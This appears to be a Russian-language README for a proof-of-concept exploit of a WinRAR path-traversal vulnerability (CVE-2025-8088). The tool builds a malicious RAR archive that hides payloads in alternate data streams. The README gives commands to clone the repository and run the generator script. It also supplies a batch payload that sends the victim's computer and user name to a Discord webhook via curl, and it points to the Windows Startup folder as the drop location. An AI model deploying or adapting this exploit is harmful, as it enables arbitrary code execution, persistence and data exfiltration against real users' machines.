Эксплуатация CVE в Winrar до версии 7.13 с использованием нескольких потоков ADS в одном файле (Пользовательская реализация PDF)
Эксплойт proof-of-concept для уязвимости WinRAR (CVE-2025-8088), затрагивающей версии 7.12 и ниже. Этот инструмент создаёт вредоносный RAR-архив, который внедряет полезные нагрузки в альтернативные потоки данных (ADS) с обходом пути, что потенциально может привести к выполнению произвольного кода.
# Clone the repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088
# Install dependencies
pip install reportlab
# Run the exploit
python CVE-2025-8088.py
Отредактируйте полезную нагрузку для вызова Discord webhook:
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
Замените YOUR_DISCORD_WEBHOOK_URL на ваш реальный URL вебхука.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\